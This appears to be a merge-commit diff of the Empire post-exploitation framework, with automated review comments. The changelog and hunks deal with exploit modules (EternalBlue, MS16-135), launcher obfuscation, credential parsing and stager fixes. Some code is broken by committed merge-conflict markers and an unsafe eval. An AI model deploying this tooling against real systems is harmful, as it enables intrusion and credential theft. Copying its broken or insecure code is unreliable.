Merged with master

websockets-multiuser
xorrior 2017-10-12 12:15:44 -04:00
commit 4aea7272f0
18 changed files with 128 additions and 259 deletions


@ -14,18 +14,24 @@ Running
- Improved ScriptBlock logging bypasses #740 @cobbr_io
- Slack Integration - Notification for new Agents #737 @dchrastil
- Improve Get-ChromeDump #734 @ThePirateWhoSmellsOfSunFlowers
- Fix Eternal Blue Issue #656
- Merge Invoke-Kerberoast: Print hashes only. Formatting with a text editor is no longer required. #663
- Fix Macro syntax error per @utkusen issue #664
- Fix Better powershell install, obfuscation bug fixes, fixed vbs/macro launchers #686 @cobbr
- Fix creds manual add parsing with whitespace in password
- Fix validate length parameter attribute for Invoke-PSInject.ps1d
8/28/2017
--------
- Version 2.1 Master Release
-Add get schwifty trollsploit module @424f424f
-Add -sta flag to launcher @xorrior
-Fixed hardoced cert path @xorrior
-Fixed hardcoded cert path @xorrior
-Fix for #567
-Merge Capture OSX credentials from Prompt Module in Empire DB @malcomvetter.
-Rest Api fixups #526 @byt3bl33d3r
-Rest API fixups #526 @byt3bl33d3r
-Added MS16-135 exploit module @ThePirateWhoSmellsOfSunflowers
-Updated Bloodhound Ingestion module @rvrsh3ll
-Updated Bloodhound Ingestion module @424f424f
-Added Dropbox exfil module @ktevora1
-Added EternalBlue module @ktevora1
-Fix SSL certificate issue with Flask @diskonnect
@ -37,7 +43,7 @@ Running
-Add SandboxMode to evade Apple Sandbox protection on applescript #578 @dchrastil
-Add Obfuscated Empire #597 @cobbr
-Add Bypass ScriptBlock Logging #603 @cobbr
-Add mimipenguin module @rvrsh3ll
-Add mimipenguin module @424f424f
-Add dyld_print_to_file Mac privesc @checkyfuntime
-Added manual proxy specifications @xorrior
-Fix libssl-dev and libssl1.0.0 packages @xorrior


@ -1,46 +0,0 @@
-----BEGIN PRIVATE KEY-----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-----END PRIVATE KEY-----
-----BEGIN CERTIFICATE-----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-----END CERTIFICATE-----


@ -1082,4 +1082,4 @@ Outputs a custom object containing the SamAccountName, ServicePrincipalName, and
Invoke-RevertToSelf -TokenHandle $LogonToken
}
}
}
}

19
empire

@ -4,11 +4,17 @@ import sqlite3, argparse, sys, argparse, logging, json, string
import os, re, time, signal, copy, base64, pickle
from flask import Flask, request, jsonify, make_response, abort, url_for
from time import localtime, strftime, sleep
<<<<<<< HEAD
import hashlib
from OpenSSL import SSL
from Crypto.Random import random
import ssl
=======
from OpenSSL import SSL
from Crypto.Random import random
import ssl
>>>>>>> master
# Empire imports
from lib.common import empire
from lib.common import helpers
@ -200,7 +206,6 @@ def start_restful_api(empireMenu, suppress=False, username=None, password=None,
# suppress all stdout and don't initiate the main cmdloop
sys.stdout = open(os.devnull, 'w')
# validate API token before every request except for the login URI
@app.before_request
def check_token():
@ -1221,7 +1226,10 @@ def start_restful_api(empireMenu, suppress=False, username=None, password=None,
signal.signal(signal.SIGINT, signal.default_int_handler)
sys.exit()
<<<<<<< HEAD
=======
>>>>>>> master
try:
signal.signal(signal.SIGINT, signal_handler)
except ValueError:
@ -1234,7 +1242,6 @@ def start_restful_api(empireMenu, suppress=False, username=None, password=None,
app.run(host='0.0.0.0', port=int(port), ssl_context=context, threaded=True)
if __name__ == '__main__':
parser = argparse.ArgumentParser()
@ -1267,7 +1274,11 @@ if __name__ == '__main__':
print empire.VERSION
elif args.rest:
<<<<<<< HEAD
# start an Empire instance and RESTful API
=======
# start an Empire instance and RESTful API
>>>>>>> master
main = empire.MainMenu(args=args)
def thread_api(empireMenu):
while serverExitCommand == 'restart':
@ -1290,7 +1301,11 @@ if __name__ == '__main__':
start_restful_api(empireMenu=main, suppress=True, username=args.username, password=args.password, port=args.restport)
except SystemExit as e:
pass
<<<<<<< HEAD
=======
>>>>>>> master
else:
# normal execution
main = empire.MainMenu(args=args)
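Review bot: Unresolved merge-conflict markers are committed into this script: `<<<<<<< HEAD`, `=======` and `>>>>>>> master` sit in the import block (the hunk header's 11 to 17 line growth indicates they are on the new side) and again in three later hunks, after `sys.exit()`, around the `# start an Empire instance and RESTful API` comment, and after the `except SystemExit` handler. Python cannot parse these lines, so the file would fail with a SyntaxError before the `check_token` request filter or the TLS `ssl_context` setup ever runs. Resolve each region to one side; in the import block that means a single copy of `from OpenSSL import SSL`, `from Crypto.Random import random` and `import ssl`, keeping `import hashlib` only if the file still uses it. The function bodies around these hunks are outside the visible lines.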


@ -67,7 +67,7 @@ def validate_ip(IP):
"""
Uses iptools to validate an IP.
"""
try:
try:
validate_IPv4 = iptools.ipv4.validate_ip(IP)
validate_IPv6 = iptools.ipv6.validate_ip(IP)
@ -93,7 +93,7 @@ def validate_ntlm(data):
def generate_ip_list(s):
"""
Takes a comma separated list of IP/range/CIDR addresses and
Takes a comma separated list of IP/range/CIDR addresses and
generates an IP range list.
"""
@ -105,7 +105,7 @@ def generate_ip_list(s):
ranges = ""
if s and s != "":
parts = s.split(",")
for part in parts:
p = part.split("-")
if len(p) == 2:
@ -121,7 +121,7 @@ def generate_ip_list(s):
return eval("iptools.IpRangeList("+ranges+")")
else:
return None
else:
return None
@ -213,13 +213,13 @@ def strip_powershell_comments(data):
Strip block comments, line comments, empty lines, verbose statements,
and debug statements from a PowerShell source file.
"""
# strip block comments
strippedCode = re.sub(re.compile('<#.*?#>', re.DOTALL), '\n', data)
# strip blank lines, lines starting with #, and verbose/debug statements
strippedCode = "\n".join([line for line in strippedCode.split('\n') if ((line.strip() != '') and (not line.strip().startswith("#")) and (not line.strip().lower().startswith("write-verbose ")) and (not line.strip().lower().startswith("write-debug ")) )])
return strippedCode
@ -239,7 +239,7 @@ def get_powerview_psreflect_overhead(script):
else:
# otherwise extracting from PowerView
pattern = re.compile(r'\n\$Mod =.*\[\'wtsapi32\'\]', re.DOTALL)
try:
return strip_powershell_comments(pattern.findall(script)[0])
except:
@ -249,7 +249,7 @@ def get_powerview_psreflect_overhead(script):
def get_dependent_functions(code, functionNames):
"""
Helper that takes a chunk of PowerShell code and a set of function
Helper that takes a chunk of PowerShell code and a set of function
names and returns the unique set of function names within the script block.
"""
@ -309,13 +309,13 @@ def find_all_dependent_functions(functions, functionsToProcess, resultFunctions=
def generate_dynamic_powershell_script(script, functionNames):
"""
Takes a PowerShell script and a function name (or array of function names,
generates a dictionary of "[functionNames] -> functionCode", and recursively
generates a dictionary of "[functionNames] -> functionCode", and recursively
maps all dependent functions for the specified function name.
A script is returned with only the code necessary for the given
functionName, stripped of comments and whitespace.
Note: for PowerView, it will also dynamically detect if psreflect
Note: for PowerView, it will also dynamically detect if psreflect
overhead is needed and add it to the result script.
"""
@ -337,7 +337,7 @@ def generate_dynamic_powershell_script(script, functionNames):
# start building the new result script
functionDependencies = []
for functionName in functionNames:
for functionName in functionNames:
functionDependencies += find_all_dependent_functions(functions, functionName, [])
functionDependencies = unique(functionDependencies)
@ -371,12 +371,12 @@ def parse_credentials(data):
if parts[0].startswith("Hostname:"):
return parse_mimikatz(data)
# collection/prompt output
# powershell/collection/prompt output
elif parts[0].startswith("[+] Prompted credentials:"):
parts = parts[0].split("->")
if len(parts) == 2:
username = parts[1].split(":",1)[0].strip()
password = parts[1].split(":",1)[1].strip()
@ -385,13 +385,20 @@ def parse_credentials(data):
username = username.split("\\")[1].strip()
else:
domain = ""
return [("plaintext", domain, username, password, "", "")]
else:
print color("[!] Error in parsing prompted credential output.")
return None
# python/collection/prompt (Mac OS)
elif "text returned:" in parts[0]:
parts2 = parts[0].split("text returned:")
if len(parts2) >= 2:
password = parts2[-1]
return [("plaintext", "", "", password, "", "")]
else:
return None
@ -433,7 +440,7 @@ def parse_mimikatz(data):
lines2 = match.split("\n")
username, domain, password = "", "", ""
for line in lines2:
try:
if "Username" in line:
@ -446,7 +453,7 @@ def parse_mimikatz(data):
pass
if username != "" and password != "" and password != "(null)":
sid = ""
# substitute the FQDN in if it matches
@ -567,7 +574,7 @@ def get_datetime():
Return the current date/time
"""
return strftime("%Y-%m-%d %H:%M:%S", localtime())
def get_file_datetime():
"""
@ -630,7 +637,7 @@ def lhost():
for ifname in interfaces:
if "lo" not in ifname:
try:
ip = get_interface_ip(ifname)
ip = get_interface_ip(ifname)
if ip != "":
break
except:
@ -643,11 +650,11 @@ def color(string, color=None):
"""
Change text color for the Linux terminal.
"""
attr = []
# bold
attr.append('1')
if color:
if color.lower() == "red":
attr.append('31')
@ -674,7 +681,7 @@ def color(string, color=None):
def unique(seq, idfun=None):
"""
Uniquifies a list, order preserving.
from http://www.peterbe.com/plog/uniqifiers-benchmark
"""
if idfun is None:
@ -695,7 +702,7 @@ def unique(seq, idfun=None):
def uniquify_tuples(tuples):
"""
Uniquifies Mimikatz tuples based on the password.
cred format- (credType, domain, username, password, hostname, sid)
"""
seen = set()
@ -740,7 +747,7 @@ def complete_path(text, line, arg=False):
else:
# if we have "command path"
argData = line.split()[0:]
if not argData or len(argData) == 1:
completions = os.listdir('./')
else:
@ -748,7 +755,7 @@ def complete_path(text, line, arg=False):
if part == '':
dir = './'
elif dir == '':
dir = '/'
dir = '/'
completions = []
for f in os.listdir(dir):
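Review bot: `generate_ip_list` still ends in `return eval("iptools.IpRangeList("+ranges+")")`, which evaluates a Python expression assembled from text. The visible lines show `s` being split on `,` and `-`, and `ranges` is presumably built from those pieces, so input that is not a well-formed address would be evaluated as code rather than rejected. This commit only touches whitespace in that function, but the call is worth replacing while the file is open: validate each piece, collect the entries in a list, and call `iptools.IpRangeList(*entries)`. The lines that build `ranges` are outside the hunks, so confirm the entry shapes (plain strings versus start/end tuples) before changing it.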


@ -13,7 +13,6 @@ import pickle
import hashlib
import copy
class Listeners:
"""
Listener handling class.


@ -7,7 +7,6 @@ import time
import copy
from pydispatch import dispatcher
from flask import Flask, request, make_response
import pdb
# Empire imports
from lib.common import helpers
from lib.common import agents


@ -263,6 +263,7 @@ class Listener:
uris = [a.strip('/') for a in profile.split('|')[0].split(',')]
stagingKey = listenerOptions['StagingKey']['Value']
host = listenerOptions['Host']['Value']
workingHours = listenerOptions['WorkingHours']['Value']
folder = listenerOptions['Folder']['Value']
if language.lower() == 'powershell':
@ -325,6 +326,7 @@ class Listener:
lostLimit = listenerOptions['DefaultLostLimit']['Value']
killDate = listenerOptions['KillDate']['Value']
folder = listenerOptions['Folder']['Value']
workingHours = listenerOptions['WorkingHours']['Value']
b64DefaultResponse = base64.b64encode(self.default_response())
if language == 'powershell':


@ -77,7 +77,7 @@ class Module:
if option in self.options:
self.options[option]['Value'] = value
def generate(self):
def generate(self, obfuscate=False, obfuscationCommand=""):
# read in the common module source code
moduleSource = self.mainMenu.installPath + "/data/module_source/exploitation/Exploit-EternalBlue.ps1"
@ -105,4 +105,4 @@ class Module:
script += "; 'Exploit complete'"
return script
return script


@ -1,5 +1,6 @@
import os
from lib.common import helpers
import pdb
class Module:
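Review bot: `import pdb` looks like a leftover debugging import; the hunk header grows the file head from 5 to 6 lines and nothing visible here uses `pdb`. If no `pdb.set_trace()` call remains in the module, drop the line, since a stray breakpoint would leave the process blocked waiting on stdin. The class body is outside the hunk, so that could not be checked from here.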


@ -73,7 +73,7 @@ class Module:
self.options[option]['Value'] = value
def generate(self):
def generate(self, obfuscate=False, obfuscationCommand=""):
moduleSource = self.mainMenu.installPath + "/data/module_source/privesc/Invoke-MS16135.ps1"
try:
@ -101,5 +101,6 @@ class Module:
script += 'Invoke-MS16135 -Command "' + launcherCode + '"'
script += ';`nInvoke-MS16135 completed.'
if obfuscate:
script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand)
return script


@ -1,137 +0,0 @@
from lib.common import helpers
class Module:
def __init__(self, mainMenu, params=[]):
# metadata info about the module, not modified during runtime
self.info = {
# name for the module that will appear in module menus
'Name': 'ls',
# list of one or more authors for the module
'Author': ['@xorrior'],
# more verbose multi-line description of the module
'Description': ('List contents of a directory'),
# True if the module needs to run in the background
'Background': False,
# File extension to save the file as
# no need to base64 return data
'OutputExtension': None,
'NeedsAdmin' : False,
# True if the method doesn't touch disk/is reasonably opsec safe
'OpsecSafe': True,
# the module language
'Language' : 'python',
# the minimum language version needed
'MinLanguageVersion' : '2.6',
# list of any references/other comments
'Comments': [
'Link:',
'http://stackoverflow.com/questions/17809386/how-to-convert-a-stat-output-to-a-unix-permissions-string'
]
}
# any options needed by the module, settable during runtime
self.options = {
# format:
# value_name : {description, required, default_value}
'Agent': {
# The 'Agent' option is the only one that MUST be in a module
'Description' : 'Agent to run the module.',
'Required' : True,
'Value' : ''
},
'Path': {
'Description' : 'Path. Defaults to the current directory. This module is mainly for organization. The alias \'ls\' can be used at the agent menu.',
'Required' : True,
'Value' : '.'
}
}
# save off a copy of the mainMenu object to access external functionality
# like listeners/agent handlers/etc.
self.mainMenu = mainMenu
# During instantiation, any settable option parameters
# are passed as an object set to the module and the
# options dictionary is automatically set. This is mostly
# in case options are passed on the command line
if params:
for param in params:
# parameter format is [Name, Value]
option, value = param
if option in self.options:
self.options[option]['Value'] = value
def generate(self, obfuscate=False, obfuscationCommand=""):
filePath = self.options['Path']['Value']
filePath += '/'
script = """
try:
import Foundation
from AppKit import *
import os
import stat
except:
print "A required module is missing.."
def permissions_to_unix_name(st_mode):
permstr = ''
usertypes = ['USR', 'GRP', 'OTH']
for usertype in usertypes:
perm_types = ['R', 'W', 'X']
for permtype in perm_types:
perm = getattr(stat, 'S_I%%s%%s' %% (permtype, usertype))
if st_mode & perm:
permstr += permtype.lower()
else:
permstr += '-'
return permstr
path = "%s"
dirlist = os.listdir(path)
filemgr = NSFileManager.defaultManager()
directoryListString = "\\t\\towner\\tgroup\\t\\tlast modified\\tsize\\t\\tname\\n"
for item in dirlist:
fullpath = os.path.abspath(os.path.join(path,item))
attrs = filemgr.attributesOfItemAtPath_error_(os.path.abspath(fullpath), None)
name = item
lastModified = str(attrs[0]['NSFileModificationDate'])
group = str(attrs[0]['NSFileGroupOwnerAccountName'])
owner = str(attrs[0]['NSFileOwnerAccountName'])
size = str(os.path.getsize(fullpath))
if int(size) > 1024:
size = int(size) / 1024
size = str(size) + "K"
else:
size += "B"
perms = permissions_to_unix_name(os.stat(fullpath)[0])
listString = perms + " " + owner + "\\t" + group + "\\t\\t" + lastModified.split(" ")[0] + "\\t" + size + "\\t\\t" + name + "\\n"
if os.path.isdir(fullpath):
listString = "d"+listString
else:
listString = "-"+listString
directoryListString += listString
print str(os.getcwd())
print directoryListString
""" % filePath
return script


@ -810,7 +810,7 @@ http://www.danielbohannon.com
# Perform final check to remove ticks if they now precede lowercase special characters after the string is reversed.
# E.g. "testin`G" in reverse would be "G`nitset" where `n would be interpreted as a newline character.
$SpecialCharacters = @('a','b','f','n','r','t','v','0')
$SpecialCharacters = @('a','b','f','n','r','u','t','v','0')
ForEach($SpecialChar in $SpecialCharacters)
{
If($ScriptString.Contains("``"+$SpecialChar))
@ -900,4 +900,4 @@ http://www.danielbohannon.com
$ScriptString = (Get-Random -Input $InvokeOptions)
Return $ScriptString
}
}


@ -1032,7 +1032,7 @@ http://www.danielbohannon.com
$CharIndexesToObfuscate = (Get-Random -InputObject (1..($TokenArray.Length-2)) -Count $NumberOfCharsToObfuscate)
# Special characters in PowerShell must be upper-cased before adding a tick before the character.
$SpecialCharacters = @('a','b','f','n','r','t','v')
$SpecialCharacters = @('a','b','f','n','r','u','t','v','0')
# Remove the possibility of a single tick being placed only before the token string.
# This would leave the string value completely intact, thus defeating the purpose of the tick obfuscation.


@ -9,7 +9,7 @@ class Stager:
'Author': ['@kisasondi','@harmj0y'],
'Description': ('Generates a bunny script that runes a one-liner stage0 launcher for Empire.'),
'Description': ('Generates a bunny script that runs a one-liner stage0 launcher for Empire.'),
'Comments': [
'This stager is modification of the ducky stager by @harmj0y,',


@ -104,7 +104,7 @@ class Stager:
print helpers.color("[!] Error in launcher command generation.")
return ""
else:
chunks = list(helpers.chunks(launcher.replace("'", "\\'"), 50))
chunks = list(helpers.chunks(launcher, 50))
payload = "\tDim "+Str+" As String\n"
payload += "\t"+Str+" = \"" + str(chunks[0]) + "\"\n"
for chunk in chunks[1:]:

1
setup/bomutils Submodule

@ -0,0 +1 @@
Subproject commit 3f7dc2dbbc36ca1c957ec629970026f45594a52c


@ -47,17 +47,27 @@ elif lsb_release -d | grep -q "Kali"; then
pip install zlib_wrapper
pip install netifaces
if ! which powershell > /dev/null; then
wget http://archive.ubuntu.com/ubuntu/pool/main/i/icu/libicu55_55.1-7_amd64.deb
wget http://ftp.debian.org/debian/pool/main/o/openssl/libssl1.0.0_1.0.1t-1+deb8u6_amd64.deb
wget https://github.com/PowerShell/PowerShell/releases/download/v6.0.0-alpha.16/powershell_6.0.0-alpha.16-1ubuntu1.16.04.1_amd64.deb
apt-get install -y libunwind8
dpkg -i libicu55_55.1-7_amd64.deb
dpkg -i libssl1.0.0_1.0.1t-1+deb8u6_amd64.deb
dpkg -i powershell_6.0.0-alpha.16-1ubuntu1.16.04.1_amd64.deb
apt-get install -f -y
rm libicu55_55.1-7_amd64.deb
rm libssl1.0.0_1.0.1t-1+deb8u6_amd64.deb
rm powershell_6.0.0-alpha.16-1ubuntu1.16.04.1_amd64.deb
if uname -a | grep -q amd64; then
wget http://archive.ubuntu.com/ubuntu/pool/main/i/icu/libicu52_52.1-3_amd64.deb
wget http://ftp.debian.org/debian/pool/main/o/openssl/libssl1.0.0_1.0.1t-1+deb8u6_amd64.deb
dpkg -i libicu52_52.1-3_amd64.deb
dpkg -i libssl1.0.0_1.0.1t-1+deb8u6_amd64.deb
rm libicu52_52.1-3_amd64.deb
rm libssl1.0.0_1.0.1t-1+deb8u6_amd64.deb
elif uname -a | grep -q i386; then
wget http://archive.ubuntu.com/ubuntu/pool/main/i/icu/libicu52_52.1-3_i386.deb
wget http://ftp.debian.org/debian/pool/main/o/openssl/libssl1.0.0_1.0.1t-1+deb8u6_i386.deb
dpkg -i libicu52_52.1-3_i386.deb
dpkg -i libssl1.0.0_1.0.1t-1+deb8u6_i386.deb
rm libicu52_52.1-3_i386.deb
rm libssl1.0.0_1.0.1t-1+deb8u6_i386.deb
fi
curl https://packages.microsoft.com/keys/microsoft.asc | apt-key add -
curl https://packages.microsoft.com/config/ubuntu/14.04/prod.list | sudo tee /etc/apt/sources.list.d/microsoft.list
apt-get update
apt-get install -y powershell
rm /opt/microsoft/powershell/*/DELETE_ME_TO_DISABLE_CONSOLEHOST_TELEMETRY
fi
mkdir -p /usr/local/share/powershell/Modules
cp -r ../lib/powershell/Invoke-Obfuscation /usr/local/share/powershell/Modules
@ -78,17 +88,15 @@ elif lsb_release -d | grep -q "Ubuntu"; then
pip install zlib_wrapper
pip install netifaces
if ! which powershell > /dev/null; then
wget http://archive.ubuntu.com/ubuntu/pool/main/i/icu/libicu55_55.1-7_amd64.deb
wget http://ftp.debian.org/debian/pool/main/o/openssl/libssl1.0.0_1.0.1t-1+deb8u6_amd64.deb
wget https://github.com/PowerShell/PowerShell/releases/download/v6.0.0-alpha.16/powershell_6.0.0-alpha.16-1ubuntu1.16.04.1_amd64.deb
apt-get install -y libunwind8
dpkg -i libicu55_55.1-7_amd64.deb
dpkg -i libssl1.0.0_1.0.1t-1+deb8u6_amd64.deb
dpkg -i powershell_6.0.0-alpha.16-1ubuntu1.16.04.1_amd64.deb
apt-get install -f -y
rm libicu55_55.1-7_amd64.deb
rm libssl1.0.0_1.0.1t-1+deb8u6_amd64.deb
rm powershell_6.0.0-alpha.16-1ubuntu1.16.04.1_amd64.deb
curl https://packages.microsoft.com/keys/microsoft.asc | apt-key add -
if lsb_release -r | grep -q "14.04"; then
curl https://packages.microsoft.com/config/ubuntu/14.04/prod.list | sudo tee /etc/apt/sources.list.d/microsoft.list
elif lsb_release -r | grep -q "16.04"; then
curl https://packages.microsoft.com/config/ubuntu/16.04/prod.list | sudo tee /etc/apt/sources.list.d/microsoft.list
fi
apt-get update
apt-get install -y powershell
rm /opt/microsoft/powershell/*/DELETE_ME_TO_DISABLE_CONSOLEHOST_TELEMETRY
fi
mkdir -p /usr/local/share/powershell/Modules
cp -r ../lib/powershell/Invoke-Obfuscation /usr/local/share/powershell/Modules
@ -108,19 +116,32 @@ else
pip install 'pyopenssl==17.2.0'
pip install zlib_wrapper
pip install netifaces
pip install M2Crypto
if ! which powershell > /dev/null; then
wget http://archive.ubuntu.com/ubuntu/pool/main/i/icu/libicu55_55.1-7_amd64.deb
wget http://ftp.debian.org/debian/pool/main/o/openssl/libssl1.0.0_1.0.1t-1+deb8u6_amd64.deb
wget https://github.com/PowerShell/PowerShell/releases/download/v6.0.0-alpha.16/powershell_6.0.0-alpha.16-1ubuntu1.16.04.1_amd64.deb
apt-get install -y libunwind8
dpkg -i libicu55_55.1-7_amd64.deb
dpkg -i libssl1.0.0_1.0.1t-1+deb8u6_amd64.deb
dpkg -i powershell_6.0.0-alpha.16-1ubuntu1.16.04.1_amd64.deb
apt-get install -f -y
rm libicu55_55.1-7_amd64.deb
rm libssl1.0.0_1.0.1t-1+deb8u6_amd64.deb
rm powershell_6.0.0-alpha.16-1ubuntu1.16.04.1_amd64.deb
if lsb_release -d | grep -q Debian | grep 9; then
if uname -a | grep -q amd64; then
wget http://archive.ubuntu.com/ubuntu/pool/main/i/icu/libicu52_52.1-3_amd64.deb
wget http://ftp.debian.org/debian/pool/main/o/openssl/libssl1.0.0_1.0.1t-1+deb8u6_amd64.deb
dpkg -i libicu52_52.1-3_amd64.deb
dpkg -i libssl1.0.0_1.0.1t-1+deb8u6_amd64.deb
rm libicu52_52.1-3_amd64.deb
rm libssl1.0.0_1.0.1t-1+deb8u6_amd64.deb
elif uname -a | grep -q i386; then
wget http://archive.ubuntu.com/ubuntu/pool/main/i/icu/libicu52_52.1-3_i386.deb
wget http://ftp.debian.org/debian/pool/main/o/openssl/libssl1.0.0_1.0.1t-1+deb8u6_i386.deb
dpkg -i libicu52_52.1-3_i386.deb
dpkg -i libssl1.0.0_1.0.1t-1+deb8u6_i386.deb
rm libicu52_52.1-3_i386.deb
rm libssl1.0.0_1.0.1t-1+deb8u6_i386.deb
fi
fi
curl https://packages.microsoft.com/keys/microsoft.asc | apt-key add -
curl https://packages.microsoft.com/config/ubuntu/14.04/prod.list | sudo tee /etc/apt/sources.list.d/microsoft.list
apt-get update
apt-get install -y powershell
rm /opt/microsoft/powershell/*/DELETE_ME_TO_DISABLE_CONSOLEHOST_TELEMETRY
fi
mkdir -p /usr/local/share/powershell/Modules
cp -r ../lib/powershell/Invoke-Obfuscation /usr/local/share/powershell/Modules
fi
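Review bot: The `wget http://archive.ubuntu.com/...` and `wget http://ftp.debian.org/...` lines in the Kali hunk and the final `else` hunk fetch `.deb` packages over plain HTTP and pass them straight to `dpkg -i` as root with no signature or checksum check, so a party on the network path could substitute the package. Pin a digest and verify it before installing, e.g. `echo "<EXPECTED_SHA256>  libssl1.0.0_1.0.1t-1+deb8u6_amd64.deb" | sha256sum -c - || exit 1`, or install from a configured apt repository so that apt verifies the signature. Separately, `if lsb_release -d | grep -q Debian | grep 9; then` can never be true, because `grep -q` prints nothing for the second `grep` to match; `lsb_release -d | grep -q 'Debian.* 9'` would express what seems intended. The surrounding `if`/`elif` chain starts outside the hunks.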